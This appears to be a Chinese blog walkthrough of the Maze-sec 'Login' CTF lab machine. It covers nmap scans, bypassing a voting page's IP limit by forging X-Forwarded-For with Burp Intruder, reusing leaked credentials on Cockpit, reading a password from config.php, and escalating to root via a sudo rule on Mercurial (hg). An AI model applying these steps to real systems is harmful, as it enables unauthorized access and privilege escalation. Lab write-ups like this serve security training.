Login

靶机说明

  • QQ群:660930334

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec/maze-sec/login]
└─# nmap -sn 192.168.2.0/24               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 18:05 CST
Nmap scan report for 192.168.2.1
Host is up (0.00039s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00028s latency).
MAC Address: 08:00:27:EA:4D:3E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.10
Host is up (0.00052s latency).
MAC Address: 08:00:27:B1:97:C1 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.14 seconds

靶机IP:192.168.2.10

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/miaosec/maze-sec/login]
└─# nmap --min-rate 10000 -p- 192.168.2.10                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 18:05 CST
Nmap scan report for 192.168.2.10
Host is up (0.00019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin
MAC Address: 08:00:27:B1:97:C1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.42 seconds

开放端口:22、80、9090

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(root㉿kali)-[~/miaosec/maze-sec/login]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,9090 192.168.2.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 18:12 CST
Nmap scan report for 192.168.2.10
Host is up (0.00048s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http            Apache httpd 2.4.62 ((Debian))
|_http-title: \xE6\x9C\xAA\xE6\x9D\xA5\xE9\xA1\xB9\xE7\x9B\xAE\xE6\x8A\x95\xE7\xA5\xA8\xE7\xB3\xBB\xE7\xBB\x9F
|_http-server-header: Apache/2.4.62 (Debian)
9090/tcp open  ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=moban/organizationName=52a22a6e47cb4a5995fb43c3554baa0e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2025-09-07T11:51:54
|_Not valid after:  2026-09-07T11:51:54
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
...
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.13 seconds
  1. 22端口:ssh服务
  2. 80端口:http服务
  3. 9090端口:zeus-admin服务

3.udp扫描

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/miaosec/maze-sec/login]
└─# nmap -sU --top-ports 100 192.168.2.10                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 18:06 CST
Nmap scan report for 192.168.2.10
Host is up (0.00068s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:B1:97:C1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 101.19 seconds

没有开放的UDP端口

4.脚本漏洞扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~/miaosec/maze-sec/login]
└─# nmap --script=vuln -p22,80,9090 192.168.2.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 18:08 CST
Nmap scan report for 192.168.2.10
Host is up (0.00043s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.2.10
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.2.10:80/vote/index.php
|     Form id: vote_count
|     Form action: vote.php
|     
|     Path: http://192.168.2.10:80/vote/vote.php
|     Form id: vote_count
|_    Form action: vote.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
9090/tcp open  zeus-admin
MAC Address: 08:00:27:B1:97:C1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 40.76 seconds

只扫出80端口可能存在csrf

二、WEB渗透

1、80端口渗透

访问80端口,是一个投票系统
进入查看发现:

  • 每个IP只能投10票
  • 一个只能投10票

投票限制绕过

尝试投票到1000,看看是否会有什么变化
投票系统页面显示着投票的IP,尝试使用不同的IP去进行投票

X-Forwarded-For 是一个 HTTP 头部字段,用于标识通过代理服务器连接到 Web 服务器的客户端的原始 IP 地址。许多 Web 应用程序会信任这个头部来获取真实客户端 IP,但这可能被恶意利用来绕过基于 IP 的限制。

伪造请求头X-Forwarded-For

1
2
3
4
5
6
7
POST /vote/vote.php HTTP/1.1
Host: 192.168.2.12
Content-Length: 19
Cache-Control: max-age=0
X-Forwarded-For: 192.168.2.$1$
Accept-Language: zh-CN,zh;q=0.9
...

使用 BurpSuite 的 Intruder 模块,在 X-Forwarded-For 头部插入 payload,设置数值范围为 0-255,模拟不同 IP 地址进行批量投票,点击开始攻击。

解锁隐藏信息:pencek:d032fc2b8b

2、9090端口渗透

访问9090端口,是一个Cockpit服务,这是一个基于 Web 的 Linux 系统管理工具。

三、Cockpit服务利用

Cockpit 是一个服务器管理工具, 可以方便地通过浏览器来管理 Linux 服务器。在终端和 web 工具间自由切换。通过 Cockpit 启动的服务可以通过终端停止。同样,如果在终端中发生错误, 也可以在 Cockpit 的日志接口中看到。

使用上面获取到的凭证pencek:d032fc2b8b登录cockpit,成功进入

直接获取到pence权限

四、权限提升

1、获取todd权限

查看web应用的配置文件,在config.php里面找到另外一个用户todd

1
2
3
4
5
6
7
8
pencek@Login:/var/www/html/vote$ cat config.php 
<?php
// 隐藏信息配置
define('SECRET_INFO', 'pencek:d032fc2b8b');
define('REQUIRED_VOTES', 1000);  // 需要达到1000票才显示信息
define('SALT', 'your_random_salt_value_here');
define('todd','1213562e5cf594899d1348');
...

使用获取到的凭证todd:1213562e5cf594899d1348进行登录

1
2
3
4
pencek@Login:/var/www/html/vote$ su todd
Password: 
todd@Login:/var/www/html/vote$ id
uid=1001(todd) gid=1001(todd) groups=1001(todd)

2、获取root权限

查看sudo属性

sudo -l
1
2
3
4
5
Matching Defaults entries for todd on Login:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User todd may run the following commands on Login:
    (ALL) NOPASSWD: /usr/bin/hg

找到/usr/bin/hg不需要密码即可执行root权限

Mercurial (hg) 是一个分布式版本控制系统。当系统管理员配置不当,允许用户以 sudo 权限执行 hg 命令时,攻击者可能利用 hg 的某些功能来执行任意命令。

查看hg的帮助信息

发现出现了vim编辑器的页面,那么使用vim的提取方式进行提权

1
2
3
todd@Login:/var/www/html/vote$ sudo /usr/bin/hg -h
Mercurial Distributed SCM
...

成功获取到root权限

1
2
root@Login:/var/www/html/vote# id
uid=0(root) gid=0(root) groups=0(root)

五、获取FLAG

1
2
3
4
root@Login:~# cat /home/pencek/user.txt /root/root.txt 
flag{user-d032fc2b8b1213562e5cf594899d1348}
flag{root-e07910a06a086c83ba41827aa00b26ed}
root@Login:~#
Maze-sec
#Cockpit服务 #sudo-hg
Login
http://miao-sec.github.io/Maze-sec/Login/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO